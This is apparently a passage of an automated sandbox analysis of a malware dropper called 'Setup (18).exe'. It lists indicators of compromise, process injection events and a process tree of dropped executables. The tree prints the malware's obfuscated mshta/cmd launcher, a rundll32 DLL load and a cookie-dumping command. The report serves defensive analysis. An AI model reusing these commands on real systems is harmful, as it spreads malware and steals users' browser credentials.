\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7092 PING.EXE -
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 122 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 125 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 231 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 236 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 103 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 106 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 118 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5020 Setup (18).exe 5020 Setup (18).exe 396 WerFault.exe 396 WerFault.exe 420 fUf8GFAg_E3p4seDzYoR9QhL.exe 420 fUf8GFAg_E3p4seDzYoR9QhL.exe 1412 WerFault.exe 1412 WerFault.exe 3776 WerFault.exe 3776 WerFault.exe 3496 VPN.tmp 3496 VPN.tmp 2696 WerFault.exe 2696 WerFault.exe 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3192 Process not Found -
Suspicious behavior: MapViewOfSection 50 IoCs
pid Process 420 fUf8GFAg_E3p4seDzYoR9QhL.exe 7048 Esplorarne.exe.com 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 3192 Process not Found 3192 Process not Found 4900 explorer.exe 4900 explorer.exe 3192 Process not Found 3192 Process not Found 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 3192 Process not Found 3192 Process not Found 4900 explorer.exe 4900 explorer.exe 3192 Process not Found 3192 Process not Found 4900 explorer.exe 4900 explorer.exe 3192 Process not Found 3192 Process not Found 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe 4900 explorer.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 2112 WinHoster.exe 6444 4000629.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3604 D9t_w3e0AQMrrfnq7ZreWa6s.exe Token: SeRestorePrivilege 396 WerFault.exe Token: SeBackupPrivilege 396 WerFault.exe Token: SeDebugPrivilege 4120 11111.exe Token: SeDebugPrivilege 4048 52qY9qlXIkiQ9LxFOBKrtOl3.exe Token: SeDebugPrivilege 4936 kbLdxOKdaa1P0Pik5EHanq7S.exe Token: SeDebugPrivilege 4424 RwRO9FbDB2r7KpXTPV_gVLzk.exe Token: SeDebugPrivilege 1180 zKZt3szLPdXZ8XSxKGOVzcox.exe Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeDebugPrivilege 772 msedge.exe Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4392 Ophc0Uzlgkux14AnOgTuCGrs.tmp 2336 Cleaner Installation.exe 2028 cmd.exe 1688 WEATHER Manager.tmp 3496 VPN.tmp 5184 Setup.exe 6884 0HlVITTuFEgXTQKLdxctFRHr.tmp 868 msedge.exe 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6808 GameBoxWin64.exe 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 5652 svrwebui.exe 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 7048 Esplorarne.exe.com -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 7048 Esplorarne.exe.com 7048 Esplorarne.exe.com 7048 Esplorarne.exe.com 4012 Esplorarne.exe.com 4012 Esplorarne.exe.com 4012 Esplorarne.exe.com 3680 compattelrunner.exe 3680 compattelrunner.exe 3680 compattelrunner.exe 1192 Esplorarne.exe.com 1192 Esplorarne.exe.com 1192 Esplorarne.exe.com 6136 aipackagechainer.exe 6136 aipackagechainer.exe 6136 aipackagechainer.exe 7448 explorer.exe 7448 explorer.exe 7448 explorer.exe 8068 Esplorarne.exe.com 8068 Esplorarne.exe.com 8068 Esplorarne.exe.com 3852 Esplorarne.exe.com 3852 Esplorarne.exe.com 3852 Esplorarne.exe.com 2472 Esplorarne.exe.com 2472 Esplorarne.exe.com 2472 Esplorarne.exe.com 7616 Esplorarne.exe.com 7616 Esplorarne.exe.com 7616 Esplorarne.exe.com 7840 Esplorarne.exe.com 7840 Esplorarne.exe.com 7840 Esplorarne.exe.com 2920 Esplorarne.exe.com 2920 Esplorarne.exe.com 2920 Esplorarne.exe.com 7660 Esplorarne.exe.com 7660 Esplorarne.exe.com 7660 Esplorarne.exe.com 6416 Esplorarne.exe.com 6416 Esplorarne.exe.com 6416 Esplorarne.exe.com 7380 Esplorarne.exe.com 7380 Esplorarne.exe.com 7380 Esplorarne.exe.com 3344 Esplorarne.exe.com 3344 Esplorarne.exe.com 3344 Esplorarne.exe.com 2084 Esplorarne.exe.com 2084 Esplorarne.exe.com 2084 Esplorarne.exe.com 2812 Esplorarne.exe.com 2812 Esplorarne.exe.com 2812 Esplorarne.exe.com 2912 Esplorarne.exe.com 2912 Esplorarne.exe.com 2912 Esplorarne.exe.com 7528 Esplorarne.exe.com 7528 Esplorarne.exe.com 7528 Esplorarne.exe.com 7604 Esplorarne.exe.com 7604 Esplorarne.exe.com 7604 Esplorarne.exe.com 3228 Esplorarne.exe.com -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 6500 EA51.exe 7532 cmd.exe 5188 MaskVPNUpdate.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3192 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5020 wrote to memory of 2372 5020 Setup (18).exe 93 PID 5020 wrote to memory of 2372 5020 Setup (18).exe 93 PID 5020 wrote to memory of 2372 5020 Setup (18).exe 93 PID 5020 wrote to memory of 4424 5020 Setup (18).exe 92 PID 5020 wrote to memory of 4424 5020 Setup (18).exe 92 PID 5020 wrote to memory of 4424 5020 Setup (18).exe 92 PID 5020 wrote to memory of 3604 5020 Setup (18).exe 91 PID 5020 wrote to memory of 3604 5020 Setup (18).exe 91 PID 5020 wrote to memory of 3632 5020 Setup (18).exe 90 PID 5020 wrote to memory of 3632 5020 Setup (18).exe 90 PID 5020 wrote to memory of 3632 5020 Setup (18).exe 90 PID 5020 wrote to memory of 3980 5020 Setup (18).exe 89 PID 5020 wrote to memory of 3980 5020 Setup (18).exe 89 PID 5020 wrote to memory of 3980 5020 Setup (18).exe 89 PID 5020 wrote to memory of 4988 5020 Setup (18).exe 88 PID 5020 wrote to memory of 4988 5020 Setup (18).exe 88 PID 5020 wrote to memory of 4988 5020 Setup (18).exe 88 PID 5020 wrote to memory of 3560 5020 Setup (18).exe 87 PID 5020 wrote to memory of 3560 5020 Setup (18).exe 87 PID 5020 wrote to memory of 3560 5020 Setup (18).exe 87 PID 5020 wrote to memory of 4936 5020 Setup (18).exe 85 PID 5020 wrote to memory of 4936 5020 Setup (18).exe 85 PID 5020 wrote to memory of 4936 5020 Setup (18).exe 85 PID 5020 wrote to memory of 4496 5020 Setup (18).exe 84 PID 5020 wrote to memory of 4496 5020 Setup (18).exe 84 PID 5020 wrote to memory of 4496 5020 Setup (18).exe 84 PID 5020 wrote to memory of 4512 5020 Setup (18).exe 83 PID 5020 wrote to memory of 4512 5020 Setup (18).exe 83 PID 5020 wrote to memory of 4512 5020 Setup (18).exe 83 PID 5020 wrote to memory of 4048 5020 Setup (18).exe 82 PID 5020 wrote to memory of 4048 5020 Setup (18).exe 82 PID 5020 wrote to memory of 4048 5020 Setup (18).exe 82 PID 5020 wrote to memory of 3620 5020 Setup (18).exe 81 PID 5020 wrote to memory of 3620 5020 Setup (18).exe 81 PID 5020 wrote to memory of 3620 5020 Setup (18).exe 81 PID 5020 wrote to memory of 4196 5020 Setup (18).exe 80 PID 5020 wrote to memory of 4196 5020 Setup (18).exe 80 PID 5020 wrote to memory of 4196 5020 Setup (18).exe 80 PID 5020 wrote to memory of 1180 5020 Setup (18).exe 79 PID 5020 wrote to memory of 1180 5020 Setup (18).exe 79 PID 5020 wrote to memory of 1180 5020 Setup (18).exe 79 PID 5020 wrote to memory of 4108 5020 Setup (18).exe 86 PID 5020 wrote to memory of 4108 5020 Setup (18).exe 86 PID 5020 wrote to memory of 4108 5020 Setup (18).exe 86 PID 5020 wrote to memory of 3852 5020 Setup (18).exe 100 PID 5020 wrote to memory of 3852 5020 Setup (18).exe 100 PID 5020 wrote to memory of 3852 5020 Setup (18).exe 100 PID 5020 wrote to memory of 3240 5020 Setup (18).exe 99 PID 5020 wrote to memory of 3240 5020 Setup (18).exe 99 PID 5020 wrote to memory of 3240 5020 Setup (18).exe 99 PID 5020 wrote to memory of 856 5020 Setup (18).exe 95 PID 5020 wrote to memory of 856 5020 Setup (18).exe 95 PID 5020 wrote to memory of 856 5020 Setup (18).exe 95 PID 5020 wrote to memory of 4900 5020 Setup (18).exe 104 PID 5020 wrote to memory of 4900 5020 Setup (18).exe 104 PID 5020 wrote to memory of 4900 5020 Setup (18).exe 104 PID 4512 wrote to memory of 1328 4512 s0nZi5PwZllOQFkbPY6S_tdk.exe 107 PID 4512 wrote to memory of 1328 4512 s0nZi5PwZllOQFkbPY6S_tdk.exe 107 PID 4512 wrote to memory of 1328 4512 s0nZi5PwZllOQFkbPY6S_tdk.exe 107 PID 3560 wrote to memory of 1560 3560 7ly35PFpELh0zl4A71KGHssh.exe 110 PID 3560 wrote to memory of 1560 3560 7ly35PFpELh0zl4A71KGHssh.exe 110 PID 3560 wrote to memory of 1560 3560 7ly35PFpELh0zl4A71KGHssh.exe 110 PID 3560 wrote to memory of 1572 3560 7ly35PFpELh0zl4A71KGHssh.exe 108 PID 3560 wrote to memory of 1572 3560 7ly35PFpELh0zl4A71KGHssh.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Users\Admin\Documents\zKZt3szLPdXZ8XSxKGOVzcox.exe"C:\Users\Admin\Documents\zKZt3szLPdXZ8XSxKGOVzcox.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
C:\Users\Admin\Documents\lC2ohBQ4dxmUiua5D84NthAo.exe"C:\Users\Admin\Documents\lC2ohBQ4dxmUiua5D84NthAo.exe"2⤵
- Executes dropped EXE
PID:4196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1480
-
-
-
C:\Users\Admin\Documents\fUf8GFAg_E3p4seDzYoR9QhL.exe"C:\Users\Admin\Documents\fUf8GFAg_E3p4seDzYoR9QhL.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3620 -
C:\Users\Admin\Documents\fUf8GFAg_E3p4seDzYoR9QhL.exe"C:\Users\Admin\Documents\fUf8GFAg_E3p4seDzYoR9QhL.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:420
-
-
-
C:\Users\Admin\Documents\52qY9qlXIkiQ9LxFOBKrtOl3.exe"C:\Users\Admin\Documents\52qY9qlXIkiQ9LxFOBKrtOl3.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
C:\Users\Admin\Documents\s0nZi5PwZllOQFkbPY6S_tdk.exe"C:\Users\Admin\Documents\s0nZi5PwZllOQFkbPY6S_tdk.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\s0nZi5PwZllOQFkbPY6S_tdk.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\s0nZi5PwZllOQFkbPY6S_tdk.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵PID:1328
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\s0nZi5PwZllOQFkbPY6S_tdk.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\s0nZi5PwZllOQFkbPY6S_tdk.exe" ) do taskkill -f -iM "%~NxA"4⤵PID:3688
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "s0nZi5PwZllOQFkbPY6S_tdk.exe"5⤵
- Kills process with taskkill
PID:4120
-
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Executes dropped EXE
PID:4964 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵
- Loads dropped DLL
PID:4960
-
-
-
-
-
-
C:\Users\Admin\Documents\UOjhInMKimcRVpv7WIUnWJnx.exe"C:\Users\Admin\Documents\UOjhInMKimcRVpv7WIUnWJnx.exe"2⤵
- Executes dropped EXE
PID:4496
-
-
C:\Users\Admin\Documents\kbLdxOKdaa1P0Pik5EHanq7S.exe"C:\Users\Admin\Documents\kbLdxOKdaa1P0Pik5EHanq7S.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Users\Admin\Documents\tLka0ssRdDotXFHNfLe1Aga8.exe"C:\Users\Admin\Documents\tLka0ssRdDotXFHNfLe1Aga8.exe"2⤵
- Executes dropped EXE
PID:4108
-
-
C:\Users\Admin\Documents\7ly35PFpELh0zl4A71KGHssh.exe"C:\Users\Admin\Documents\7ly35PFpELh0zl4A71KGHssh.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:1572
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
